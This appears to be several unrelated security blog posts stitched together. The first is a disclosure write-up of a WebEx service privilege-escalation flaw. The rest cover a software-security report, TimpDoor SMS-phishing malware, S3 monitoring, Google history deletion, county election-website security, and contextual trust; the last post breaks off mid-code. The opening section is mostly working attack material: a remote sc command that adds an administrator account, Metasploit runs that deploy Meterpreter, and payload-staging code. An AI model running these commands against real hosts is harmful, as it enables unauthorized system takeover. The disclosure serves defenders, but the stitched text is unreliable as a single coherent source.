We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that's done, you can use the exact same command against the remote host:

c:\>sc \\ start webexservice a software-update 1 net localgroup administrators testuser /add

The command will run (and a GUI will even pop up!) on the other machine.

Remote exploitation with Metasploit

To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.

Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:

msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit

[-]    - No service handle retrieved
[+]    - Command completed!
[-]    - No service handle retrieved
[+]    - Command completed!
[+]    - Command completed!
[+]    - Command completed!
[*] - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed

And here's the full exploit module:

msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS
msf5 exploit(windows/smb/webexec) > exploit

[*] - Connecting to the server...
[*] - Authenticating to as user 'testuser'...
[*] - Command Stager progress -   0.96% done (999/104435 bytes)
[*] - Command Stager progress -   1.91% done (1998/104435 bytes)
[*] - Command Stager progress -  98.52% done (102891/104435 bytes)
[*] - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against
[*] Sending stage (179779 bytes) to

The actual implementation is mostly straightforward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you initially get a Meterpreter .exe onto the target and execute it?

I started by using a psexec-like exploit where we upload the .exe file to a writable share, then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexec instead. You lose the magic of WebExec!

After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage the payload into an .exe file on the filesystem. Using the .vbs flavor of staging, it writes a Base64-encoded file to disk, then a .vbs stub to decode and execute it!

There are several problems, however:

  • The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
  • CmdStager uses %TEMP% as a temporary directory, but our exploit doesn't expand paths
  • WebExecService seems to escape quotation marks with a backslash, and I'm not sure how to turn that off

The first two issues could be simply worked around by adding options (once I'd figured out the options to use):

wexec(true) do |opts|
  opts[:flavor] = :vbs
  opts[:linemax] = datastore["MAX_LINE_LENGTH"]
  opts[:temp] = datastore["TMPDIR"]
  opts[:delay] = 0.05
  execute_cmdstager(opts)
end

execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:

# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finagling to make it
# work correctly
def execute_command(command, opts)
  # Replace the empty string, "", with a workaround - the first 0 characters of "A"
  command = command.gsub('""', 'mid(Chr(65), 1, 0)')

  # Replace quoted strings with Chr(XX) versions, in a naive way
  command = command.gsub(/"[^"]*"/) do |capture|
    capture.gsub(/"/, '').chars.map { |c| "Chr(#{c.ord})" }.join('+')
  end

  # Prepend "cmd /c" so we can use a redirect
  command = "cmd /c " + command

  execute_single_command(command, opts)
end

First, it replaces the empty string with mid(Chr(65), 1, 0), which works out to the first 0 characters of the string "A". Or the empty string!

Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn't use &, because that's already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.

And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.
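Putting the three transformations together, here's a rough standalone sketch of the quoting logic in Python (a hypothetical re-implementation for illustration; the function name and structure are mine, not the module's actual Ruby):

```python
import re

def escape_for_webexec(command):
    # Empty quoted strings become mid(Chr(65), 1, 0): the first 0
    # characters of "A", i.e. the empty string.
    command = command.replace('""', 'mid(Chr(65), 1, 0)')

    # Replace each remaining quoted string with Chr(n)+Chr(n)+... so no
    # literal quotation marks survive the service's backslash-escaping.
    def encode(match):
        inner = match.group(0)[1:-1]  # strip the surrounding quotes
        return '+'.join('Chr(%d)' % ord(c) for c in inner)
    command = re.sub(r'"[^"]*"', encode, command)

    # Prepend cmd /c so shell redirection (>) works in the staged command
    return 'cmd /c ' + command

print(escape_for_webexec('echo "Hi" > out.txt'))
# cmd /c echo Chr(72)+Chr(105) > out.txt
```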

In a targeted attack, it's obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!

Checking for the patch

This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!

The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it's being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!

There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it's no good as a script!

In order to exploit this, you have to be able to get a handle to the service control service (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting the service returns either OK or ACCESS_DENIED, we know it worked!

Here's the important code from the Nmap checker module we developed:

-- Create a test service that we can query
local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe"
status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command))

-- ...

local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000)

-- If the service DOES_NOT_EXIST, we couldn't run code
if string.match(test_result, 'DOES_NOT_EXIST') then
  stdnse.debug("Result: Test service does not exist: probably not vulnerable")
  msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])

  vuln.check_results = "Could not execute code via WebExService"
  return report:make_output(vuln)
end

Not shown: we also delete the service once we're finished.


So there you have it! Escalating privileges from zero to SYSTEM using WebEx's built-in update service! Local and remote! Check out for tools and usage instructions!

SOSS Volume 9 reveals how DevSecOps can overcome the volume and persistence of software flaws

Fall is a favorite season for many – in New England, we have beautiful colors and a chill in the air.  At Veracode, fall is our favorite season because it signifies the release of our annual State of Software Security (SOSS) report. Each year, we welcome the opportunity to share with the industry our insights into common vulnerabilities found in software and how organizations are measuring up to security industry benchmarks throughout the software development lifecycle.

Today, we are releasing SOSS Volume 9 – and I’m proud to say it’s one of the most impactful and rich reports we’ve done to date. Our report goes beyond how organizations’ application security (appsec) programs are performing. This year, we analyzed the data to understand the time it takes for these organizations to actually fix flaws once they’ve been identified in application security scans.

(Hint: it takes time to fix vulnerabilities)

Our ninth iteration of SOSS comes at a time when it feels as if the application security market, once a small slice of the security landscape, is finally growing up. Forrester Research recently forecasted “spending on appsec solutions will grow to $7.1 billion by 2023, up from $2.8 billion in 2017, implying a 16.4 percent compound annual growth rate.” Meanwhile, the 2018 Verizon Data Breach Investigations Report found that web application attacks were the top data breach type, leading to increased demand for application security tools.

Perhaps most astounding – while every business out there uses software, those figures may only account for half the total addressable market. In other words, a very large number of businesses are not testing their software security at all.

That’s why one of my biggest takeaways from this year is that while progress is being made, overall, there is a lot of work to do! That’s good news, however, because it means that organizations, whether or not they have already started an appsec program, can reduce their risk by creating and using more secure code.

Here’s a quick look at some of the other major findings from this year’s State of Software Security report:

DevSecOps is proving its worth: one of the most revealing findings of SOSS Volume 9 is that organizations with a DevSecOps model, which tends to incorporate more frequent security scans, incremental fixes, and faster rates of flaw closures into the SDLC, are lowering overall risk. This year’s analysis shows a very strong correlation between high rates of security scanning and lower long-term application risks, which we believe presents a significant piece of evidence for the efficacy of DevSecOps.

Volume of flaws is still extremely high, but customers are getting better at closing them: more than 85 percent of all applications have at least one vulnerability in them, and more than 13 percent have at least one critical severity flaw. Still, we found our customers closed almost 70 percent of vulnerabilities they found, which represents an improvement of 12 percentage points over last year’s report.

Flaws are persistent: pulling the curtain back on the length of time it takes for flaws to be corrected after their initial discovery is ugly, but necessary.

  • More than 70 percent of all flaws remained open one month after discovery, and nearly 55 percent remained three months after discovery
  • 25 percent of high and very high severity flaws were not addressed within 290 days of discovery
  • Overall, 25 percent of flaws were fixed within 21 days, while the final 25 percent remained open well over a year after discovery

Most prevalent common flaws remain the same: breaking down the prevalence of flaws by vulnerability categories shows that all of the usual suspects are present at roughly the same rate as in previous years. In fact, our top 10 most prevalent flaw types have hardly budged in the past year. That means that organizations across the board have made very little headway to create awareness within their development organizations about serious vulnerabilities, like cryptographic flaws, SQL injection, and cross-site scripting. This is most likely a result of organizations struggling to embed security best practices into their SDLC, regardless of where the standards are from.

There is so much more to uncover in this year’s report, including insights by industry sector and by geographic region, that can help organizations understand how appsec factors heavily into the security risks and threats they face.

We’d love to hear your feedback once you’ve had a chance to take a look!

How to Squash the Android/TimpDoor SMiShing Scam

As technology becomes more advanced, so do cybercriminals’ strategies for gaining access to our personal information. And while phishing scams have been around for over two decades, attackers have adapted their methods to “bait” victims through a variety of platforms. In fact, we’re seeing a rise in the popularity of phishing via SMS messages, or SMiShing. Just recently, the McAfee Mobile Research team discovered active SMiShing campaigns that are tricking users into downloading fake voice-messaging apps, called Android/TimpDoor.

So how does Android/TimpDoor infect a user’s device? When a victim receives the malicious text, the content includes a link. If they click on it, they’re directed to a fake web page, which prompts them to download an app in order to listen to phony voice messages. Once the app has been downloaded, the malware collects device information, including device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. TimpDoor allows cybercriminals to use the infected device as a digital intermediary without the user’s knowledge. Essentially, it creates a backdoor for hackers to access users’ home networks.

According to our team’s research, these fake apps have infected at least 5,000 devices in the U.S. since the end of March. So, the next question is what can users do to defend themselves from these attacks? Check out the following tips to stay alert and protect yourself from SMS phishing:

  • Do not install apps from unknown sources. If you receive a text asking you to download something onto your phone from a given link, make sure to do your homework. Research the app developer name, product title, download statistics, and app reviews. Be on the lookout for typos and grammatical errors in the description. This is usually a sign that the app is fake.
  • Be careful what you click on. Be sure to only click on links in text messages that are from a trusted source. If you don’t recognize the sender, or the SMS content doesn’t seem familiar, stay cautious and avoid interacting with the message.
  • Enable the feature on your mobile device that blocks texts from the Internet. Many spammers send texts from an Internet service in an attempt to hide their identities. Combat this by using this feature to block texts sent from the Internet.
  • Use a mobile security software. Make sure your mobile devices are prepared for TimpDoor or any other threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, as always, to stay up-to-date on the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Squash the Android/TimpDoor SMiShing Scam appeared first on McAfee Blogs.

DisruptOps: Quick and Dirty: Building an S3 Guardrail with Config


In How S3 Buckets Become Public, and the Fastest Way to Find Yours we reviewed the myriad ways S3 buckets become public and where to look for them. Today I’ll show the easiest way to continuously monitor for public buckets using AWS Config. The good news is this is pretty easy to set up; the bad news is you need to configure it separately in every region in every account.

Read the full post at DisruptOps

- Rich

How to quickly manage and delete your Google search history

We already know Google collects a ton of data on us, and a lot of it comes from search. Google offers plenty of ways to limit the amount of data you have lying around, but they’re not all that easy to find. Starting today, Google is making it easier to both see and delete your search activity.

Previously, you could visit your Google Account in Settings on Android phones or on the web on iOS, tap Manage your data & personalization and then My Activity to see your search results. Then you needed to tap the three-dot menu and select Delete to get rid of something. Finding your search history on desktops was just as cumbersome.


Android/TimpDoor Turns Mobile Devices Into Hidden Proxies

The McAfee Mobile Research team recently found an active phishing campaign using text messages (SMS) that tricks users into downloading and installing a fake voice-message app which allows cybercriminals to use infected devices as network proxies without users’ knowledge. If the fake application is installed, a background service starts a Socks proxy that redirects all network traffic from a third-party server via an encrypted connection through a secure shell tunnel—allowing potential access to internal networks and bypassing network security mechanisms such as firewalls and network monitors. McAfee Mobile Security detects this malware as Android/TimpDoor.

Devices running TimpDoor could serve as mobile backdoors for stealthy access to corporate and home networks because the malicious traffic and payload are encrypted. Worse, a network of compromised devices could also be used for more profitable purposes such as sending spam and phishing emails, performing ad click fraud, or launching distributed denial-of-service attacks.

Based on our analysis of 26 malicious APK files found on the main distribution server, the earliest TimpDoor variant has been available since March, with the latest APK from the end of August. According to our telemetry data, these apps have infected at least 5,000 devices. The malicious apps have been distributed via an active phishing campaign via SMS in the United States since at least the end of March. McAfee notified the unwitting hosts of the phishing domains and the malware distribution server; at the time of writing this post we have confirmed that they are no longer active.

Campaign targets North America

Since at least the end of March users in the United States have reported suspicious text messages informing them that they have two voice messages to review and tricking them into clicking a URL to hear them:

Figure 1. User reporting a text that required downloading a fake voice app. Source

Figure 2. An August 9 text. Source:

Figure 3. An August 26 text. Source:

If the user clicks on one of these links in a mobile device, the browser displays a fake web page that pretends to be from a popular classified advertisement website and asks the user to install an application to listen to the voice messages:

Figure 4. A fake website asking the user to download a voice app.

In addition to the link that provides the malicious APK, the fake site includes detailed instructions on how to disable “Unknown Sources” to install the app that was downloaded outside Google Play.

Fake voice app

When the user clicks on “Download Voice App,” the file VoiceApp.apk is downloaded from a remote server. If the victim follows the instructions, the following screens appear to make the app look legitimate:

Figure 5. Fake voice app initial screens.

The preceding screens are displayed only if the Android version of the infected device is 7.1 or later (API Level 25). If the Android version is earlier, the app skips the initial screens and displays the main fake interface to listen to the “messages”:

Figure 6. The main interface of the fake voice messages app.

Everything on the main screen is fake. The Recents, Saved, and Archive icons have no functionality. The only buttons that work play the fake audio files. The duration of the voice messages does not correspond with the length of the audio files and the phone numbers are fake, present in the resources of the app.

Once the user listens to the fake messages and closes the app, the icon is hidden from the home screen to make the app difficult to remove. Meanwhile, it starts a service in the background without the user’s knowledge:

Figure 7. Service running in the background.

Socks proxy over SSH

As soon as the service starts, the malware gathers device information: device ID, brand, model, OS version, mobile carrier, connection type, and public/local IP address. To gather the public IP address information, TimpDoor uses a free geolocation service to obtain the data (country, region, city, latitude, longitude, public IP address, and ISP) in JSON format. In case the HTTP request fails, the malware makes an HTTP request to the webpage getIP.php of the main control server, which provides the value “public_ip.”

Once the device information is collected, TimpDoor starts a secure shell (SSH) connection to the control server to get the assigned remote port by sending the device ID. This port will be later used for remote port forwarding with the compromised device acting as a local Socks proxy server. In addition to starting the proxy server through an SSH tunnel, TimpDoor establishes mechanisms to keep the SSH connection alive such as monitoring changes in the network connectivity and setting up an alarm to constantly check the established SSH tunnel:
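To make the tunneling arrangement concrete: what the malware implements programmatically is equivalent to an OpenSSH remote forward, in which the control server's assigned port is relayed back to the Socks proxy listening on the infected device. A minimal sketch of that equivalence (the helper name, user name, and default Socks port are illustrative assumptions, not values taken from the malware):

```python
import shlex

def reverse_tunnel_cmd(c2_host, assigned_port, local_socks_port=1080):
    # -R <assigned_port>:127.0.0.1:<local_socks_port>: connections arriving
    #    at the control server's assigned port are relayed back through the
    #    tunnel to the Socks proxy running on the device
    # -N: no remote command; the connection exists only to carry the tunnel
    return shlex.split(
        "ssh -N -R %d:127.0.0.1:%d proxy@%s"
        % (assigned_port, local_socks_port, c2_host)
    )

print(reverse_tunnel_cmd("c2.example", 4000))
```

The keep-alive monitoring described above then amounts to re-running this forward whenever connectivity changes or the tunnel drops.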

Figure 8. An execution thread checking changes in connectivity and making sure the SSH tunnel is running.

To ensure the SSH tunnel is up, TimpDoor executes the method updateStatus, which sends the previously collected device information and local/public IP address data to the control server via SSH.

Mobile malware distribution server

By checking the IP address 199.192.19[.]18, which hosted VoiceApp.apk, we found more APK files in the directory US. This likely stands for United States, considering that the fake phone numbers in the voice app are US numbers and the messages were sent from US phone numbers:

Figure 9. APK files in the “US” folder of the main malware distribution server.

According to the “Last modified” dates on the server, the oldest APK in the folder is chainmail.apk (March 12) while the newest is VoiceApp.apk (August 27) suggesting the campaign has run for at least five months and is likely still active.

We can divide the APK files into two groups by size (5.1MB and 3.1MB). The main difference between them is that the oldest use an HTTP proxy (LittleProxy) while the newest (July and August) use a Socks proxy (MicroSocks), which allows the routing of all traffic for any kind of network protocol (not only HTTP) on any port. Other notable differences are the package name, control server URLs, and the value of appVersion in the updateStatus method, ranging from 1.1.0 to 1.4.0.

In addition to the US folder we also found a CA folder, which could stand for Canada.

Figure 10. The “CA” folder on the distribution server.

Checking the files in the CA folder we found that VoiceApp.apk and relevanbest.apk are the same file with appVersion 1.4.0 (Socks proxy server). Octarineiads.apk is version 1.1.0, with an HTTP proxy.

TimpDoor vs MilkyDoor

TimpDoor is not the first malware that turns Android devices into mobile proxies to forward network traffic from a control server using a Socks proxy through an SSH tunnel. In April 2017 researchers discovered MilkyDoor, an apparent successor of DressCode, which was found a year earlier. Both threats were distributed as Trojanized apps in Google Play. DressCode installs only a Socks proxy server on the infected device; MilkyDoor also protects that connection to bypass network security restrictions using remote port forwarding via SSH, just as TimpDoor does. However, there are some relevant differences between TimpDoor and MilkyDoor:

  • Distribution: Instead of being part of a Trojanized app in Google Play, TimpDoor uses a completely fake voice app distributed via text message
  • SSH connection: While MilkyDoor uploads the device and IP address information to a control server to receive the connection details, TimpDoor already has the information in its code. TimpDoor uses the information to get the remote port to perform dynamic port forwarding and to periodically send updated device data.
  • Pure proxy functionality: MilkyDoor was apparently an adware integrator in early versions of the SDK and later added backdoor functionality. TimpDoor’s sole purpose (at least in this campaign) is to keep the SSH tunnel open and the proxy server running in the background without the user’s consent.

MilkyDoor seems to be a more complete SDK, with adware and downloader functionality. TimpDoor has only basic proxy functionality, first using an HTTP proxy and later Socks.


TimpDoor is the latest example of Android malware that turns devices into mobile backdoors, potentially allowing cybercriminals encrypted access to internal networks, which represents a great risk to companies and their systems. The versions found on the distribution server and the simple proxy functionality implemented in them show that this threat is probably still under development. We expect it will evolve into new variants.

Although this threat has not been seen on Google Play, this SMS phishing campaign distributing TimpDoor shows that cybercriminals are still using traditional phishing techniques to trick users into installing malicious applications.

McAfee Mobile Security detects this threat as Android/TimpDoor. To protect yourselves from this and similar threats, employ security software on your mobile devices and do not install apps from unknown sources.

The post Android/TimpDoor Turns Mobile Devices Into Hidden Proxies appeared first on McAfee Blogs.

State County Authorities Fail at Midterm Election Internet Security

One of the things we at McAfee have been looking at this midterm election season is the security of election infrastructure at the individual county and state levels.  A lot of media and cybersecurity research focus has been placed on whether a major national attack could disrupt the entire U.S. voting infrastructure. Headlines and security conferences focus on the elaborate “Hollywood-esque” scenarios where tampering with physical voting machines allows them to be hacked in 45 seconds, and the entire election system falls apart via a well-orchestrated nation state attack.  The reality is, information tampering and select county targeting is a more realistic scenario that requires greater levels of attention.

A realistic attack wouldn’t require mass voting manipulation or the hacking of physical machines. Rather it could use misinformation campaigns focused on vulnerable gaps at the county and state levels. Attackers will generally choose the simplest and most effective techniques to achieve their goal, and there are certain targets that have been overlooked which could prove to be the most practical avenues an attacker could take if their objective was to influence the outcome of an election cycle.

A well-crafted campaign could focus on specific states or congressional districts where a close race is forecasted. An attacker would then examine which counties would have a substantive impact if barriers were introduced to reduce voter turnout, either in total, or a specific subset (such as those in rural or urban parts of a district which generally have a strong correlation to conservative and liberal voting tendencies respectively).

Actors could use something as simple as a classic bulk email campaign to distribute links to fraudulent election websites that give voters false information about when, where and how to vote. Given the fact that voter data can be purchased or even freely obtained from numerous recent breaches, a very specific and targeted campaign would be trivial. As we will see, there are multiple challenges for a typical voter trying to distinguish legitimate from fraudulent sites, and the legitimate sites are often lacking the most basic security hygiene.

With this in mind we looked at how constituents get information from their election boards at the county level. County websites are typically the first place a citizen would go to look up information on the upcoming local elections.  Such information might include voter eligibility requirements, early voting schedules, deadlines to register, voting hours and other critical information.

McAfee ATR researchers surveyed the security measures of county websites in 20 states and found that the majority of these sites are sorely lacking in basic cybersecurity measures that could help protect voters from election misinformation campaigns.

What’s in a Website Name?

Our first disturbing revelation was that there’s no consistency as to how counties validate that their websites are legitimate sites belonging to genuine county officials.

I stumbled upon this initially because I live in Denton County, Texas, and went to look up the county's voter information site. When I saw the address, I was a little perplexed, because the county actually uses a website address with a .com top level domain (TLD) name rather than a .gov TLD in the name.

Domain names using .gov must pass a U.S. federal government validation process to confirm that the website in question truly belongs to the official government entity. The use of .com raised the question of whether such a naming process is common or not across county websites in Texas and in other states.

This is important, because unlike .gov sites where there is a thorough vetting process and background checks (including government officials as references), anyone can buy a .com domain.

We found that large majorities of county websites use top level domain names such as .com, .net and .us rather than the government validated .gov in their web addresses. Our findings essentially revealed that there is no official U.S. governing body validating whether the majority of county websites are legitimately owned by actual legitimate county entities.

Our study focused primarily on the swing states, or the states that were most influential in the election process, and thus the most compelling targets for threat actors. Minnesota and Texas had the largest percentage of non-.gov domain names, with 95.4% and 95% respectively. They were followed by Michigan (91.2%), New Hampshire (90%), Mississippi (86.6%) and Ohio (85.9%).

McAfee researchers found that Arizona had the largest percentage of .gov domain names, but even this state could only confirm 66.7% of county sites as using the validated addresses.

The other thing that was very concerning was that significant majorities of county sites did not enforce the use of SSL, or Secure Sockets Layer certificates. These digital certificates protect a website visitor’s web sessions, encrypting any personal information voters might share and ensuring that bad actors can’t redirect site visitors to fraudulent sites that might give them false election information.

SSL is one of the most basic forms of cyber hygiene, and something we expect all sites requiring confidentiality or data integrity to have at a minimum.  The fact that these websites are lacking in the absolute basics of cyber hygiene is troubling.

Maine had the highest number of county websites protected by SSL with 56.2%, but the state was something of an outlier. West Virginia had the greatest number of websites lacking in SSL security with 92.6% unprotected, followed by Texas (91%), Montana (90%), Mississippi (85.1%) and New Jersey (81%).

Above all, there was no consistency within states, let alone across the nation, in website naming or in how effectively SSL was applied to protect voters.

The following Orange County site protects user information with SSL at the voter registration section of the site, but not at the main home page, meaning an attacker could manipulate the content of the top-level site and replace the legitimate registration link with a fraudulent one. Visitors who followed such a link would never reach the legitimate protected site.

Florida’s Broward County became famous (perhaps infamous) during the 2000 presidential election as one of the state’s counties for which then-Vice President Al Gore requested a vote recount. Today, the site is not protected by SSL and has a .org address that is not distinguishable from a fake .org domain. The browser itself actually calls out “Not Secure” when you go to the site.

Even sites that report election results are utilizing unvalidated domains, such as the Glades County site below.

The following site from Scioto County in Ohio uses an unvalidated .NET top level domain and doesn’t protect site visitors with SSL.

The Fulton County Ohio site uses an unofficial .com top level domain and is also missing enforced SSL support.

The following site from New York’s Albany County uses an unvalidated .com TLD. It also fails to use SSL protection on the site’s critical voter information pages.

Lacking Basic Protection

Because SSL protection is a very well understood website security practice, the lack of it does not instill confidence that other systems managed at local levels are adequately secured.

Given how important the democratic process of voting is to our society and way of life, we must work to better secure these critical information systems.

If you think about a close election race with rural or urban district elements to it, a malicious actor could simply send emails to hundreds of thousands of voters in rural or urban parts of the municipality and direct voters to the wrong voting locations. Such an actor would essentially be disrupting, misdirecting and perhaps even suppressing voter turnout through misinformation.  No systems would be taken off line, no physical harm done, and likely no one would even notice until election day when angry voters showed up to the wrong sites.

We developed the following phishing email message to provide an educational example of what such an election campaign message might look like (we did NOT uncover it as a part of a real phishing campaign currently in progress):

To avoid early detection, it is most likely that a coordinated attack would take place just hours, perhaps a few days before a critical vote; the threat actors would want to provide enough time to reach a critical mass for election disruption, but little enough time to avoid detection and remediation.  At that point what could you even do?

Influencing the electorate through false communications is simpler, more practical, and more efficient than attempting to hack into hundreds of thousands of voting machines. It is much easier to execute than tampering with the machines themselves, and it scales to achieve whatever broad election objective a malicious actor might desire.

What Must Be Done Nationally

Regardless of whether central regulation or best practice publication are the best approaches to election security, we need better security standardization for all of the supporting systems that deal with elections.

While it might be difficult to pass a federal law that would mandate things like .gov naming standardization or utilizing SSL protection, an organization like the U.S. Department of Homeland Security could take a leading role by recommending these best practices.

How Voters Can Protect Themselves Locally

First, regarding SSL protection, anyone can always determine whether or not their communication with a website is protected by SSL by looking for an “HTTPS” in a site’s website address in the address bar of their browser. Some browsers also show a key or lock icon to make SSL protection easier for users to spot before they share street addresses, dates of birth, Social Security Numbers, credit card numbers or other sensitive personal information.  
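That "look for HTTPS" check is mechanical enough to sketch in code. The example below (the URLs are hypothetical, not real county sites) simply inspects the URL scheme, which is what the browser's address-bar cue reflects:

```python
# Minimal sketch: a web address is SSL/TLS-protected only if its scheme
# is "https". The example URLs below are invented for illustration.
from urllib.parse import urlparse

def uses_https(url: str) -> bool:
    return urlparse(url).scheme.lower() == "https"

print(uses_https("https://vote.example.gov/register"))  # True
print(uses_https("http://examplecounty.com/results"))   # False
```

A browser performs the real verification (certificate validity, chain of trust) before showing the lock icon; this sketch only captures the first thing a voter can check by eye.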

As for the validity of election websites, McAfee encourages voters across the country to rely on state voter registration and election sites.  Such sites have a better track record of utilizing .gov TLDs and generally enforce SSL to protect integrity and confidentiality.   These sites may navigate voters to their local sites which may suffer from the security issues described in this blog, but utilizing a state secured .gov site as a starting point is better than a search engine.

State voter registration websites:

  1. Alabama
  2. Alaska
  3. Arizona
  4. Arkansas
  5. California
  6. Colorado
  7. Connecticut
  8. DC
  9. Delaware
  10. Florida
  11. Georgia
  12. Hawaii
  13. Idaho
  14. Illinois
  15. Indiana
  16. Iowa
  17. Kansas
  18. Kentucky
  19. Louisiana
  20. Maine
  21. Maryland
  22. Massachusetts
  23. Michigan
  24. Minnesota
  25. Missouri
  26. Montana
  27. Nebraska
  28. Nevada
  29. New Hampshire
  30. New Jersey
  31. New Mexico
  32. New York
  33. North Carolina
  34. North Dakota
  35. Ohio
  36. Oklahoma
  37. Oregon
  38. Pennsylvania
  39. Rhode Island
  40. South Carolina
  41. South Dakota
  42. Tennessee
  43. Texas
  44. Utah
  45. Vermont
  46. Virginia
  47. Washington
  48. West Virginia
  49. Wisconsin
  50. Wyoming

Finally, state governments provide information phone numbers allowing voters to confirm election information. McAfee encourages voters to call these official phone numbers to confirm any seemingly contradictory information sent to them, particularly if voters received any email or other online messages regarding changes to planned election processes (time, location, ballots, etc.).

Our country’s democracy is worth a phone call.


For more perspectives on U.S. election security, please read here on the topic.

The post State County Authorities Fail at Midterm Election Internet Security appeared first on McAfee Blogs.

Contextualizing trust – how best to protect businesses’ critical data


By Dr. Richard Ford | Tags: Behavior Analytics, Data, Dynamic Data Protection, Insider Threat


Let’s cut straight to the chase: today’s businesses have real challenges with critical data protection. It’s not just the obvious targets too, such as healthcare providers and financial services; users happily share personal information via social networks, and the wealth of data tracked by the Internet of Things is mind-boggling. If you have a credit score – and you almost certainly do – there’s a lot of information that’s out there in the ether about you.

Sadly, when I say out there, I don’t just mean in the hands of the credit agencies: the 2017 breach of credit reporting agency Equifax exposed 143 million American consumers. Similarly, in September of this year, the largest breach in Facebook’s history exposed the personal information of nearly 50 million users. In today’s society, even if you’re off the grid, trust me when I tell you you’re not actually “off the grid”.

Given the lack of good choices for consumers, end users find themselves in the unenviable position of having little choice but to trust the companies that their data passes through. Similarly, though, these same companies are also in the position of having to trust – or distrust – those people, devices, systems, and infrastructure that make up the overall IT environment.

That’s a lot of trust, and is in fact part of the challenge. While people, devices, systems and infrastructure can have different priorities, agendas, and weaknesses, businesses have traditionally painted with a pretty broad brush when it comes to trust. That’s a mistake, as trust can be a powerful ally in our hunt for better, safer, and more secure relationships between provider and consumer.

In the commercial world, businesses could start by taking a page from the government playbook. Government agencies have a long history with trust - one only has to look at the clearance process that validates the trustworthiness of those who access classified data and how classified data is isolated from those who do not possess the requisite clearances for access. Governments also understand the need to balance the dual concepts of trustworthiness and risk acceptance as part of using multilevel secure systems. Mostly, this works well, even against some fairly determined external attackers as well as malicious insiders and spies. It’s easy to focus on the times this approach has broken down, but we also need to be aware of the many times it has performed exactly as designed.

But even this framework has weaknesses. Trust is interwoven throughout, but only in parts of the government, and even then, sometimes dosed out in a rather “all or nothing” way. The problem is the way we typically decontextualize trust and that stems from how we tend to think about trust differently in the online world.

When you meet someone socially and are getting to know them, most of us take cues from those initial conversations to figure out how trustworthy someone is. However, that trust is situational. You might trust your new friend to provide a ride to dinner, but not trust them (yet) with the keys to your car. It’s not just about determining whether a person is “good” or “bad”, but whether they are likely to perform a particular action reliably or not. For example, you might know someone is entirely well-intentioned but very clumsy. You might not trust that clumsy person with your most treasured crystal glass, for example, even though they are honest, reliable, and kind. It’s not that they’re bad… they’re just bad with fragile things. It’s a subtle but important difference: it’s not just do you trust someone, but do you trust someone with respect to a particular action.

Now let’s compare this to how we view trust with respect to computing. Here, defenders often apply a high degree of “inside/outside” thinking along the lines of “what’s inside is good and what’s outside is bad”. Once I’m logged in to a machine or part of an organization, I’m pretty much given free rein within my granted rights. There are some checks and balances: insider threat programs, for example, try to identify those insiders who are a danger to the organization. However, the overarching paradigm is one of trust or distrust, with not much in between. It’s the same with machines: once a machine is placed on the network, we generally trust it completely. This type of “trust” isn’t trust at all – because it’s not situational - it’s a more “permit or deny” privilege-based system... and it’s easy for an attacker to exploit. Essentially, by decontextualizing the trust and reducing it to an all or nothing score, we allow anyone who gets into that trusted domain to do whatever they like: the challenge for the attacker is then reduced to how to get in the door.
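The difference between "do you trust someone" and "do you trust someone with respect to a particular action" can be made concrete with a toy model. This sketch is purely illustrative; the principals, actions, and scores are invented:

```python
# Toy contrast between all-or-nothing trust and contextual trust.
# All names and scores below are invented for illustration.

def binary_trust(is_insider: bool) -> bool:
    # The "inside is good, outside is bad" model: one bit, no context.
    return is_insider

# Contextual trust: a score per (principal, action) pair, compared
# against a threshold at the moment of the request.
TRUST_SCORES = {
    ("new_friend", "drive_me_to_dinner"): 0.9,
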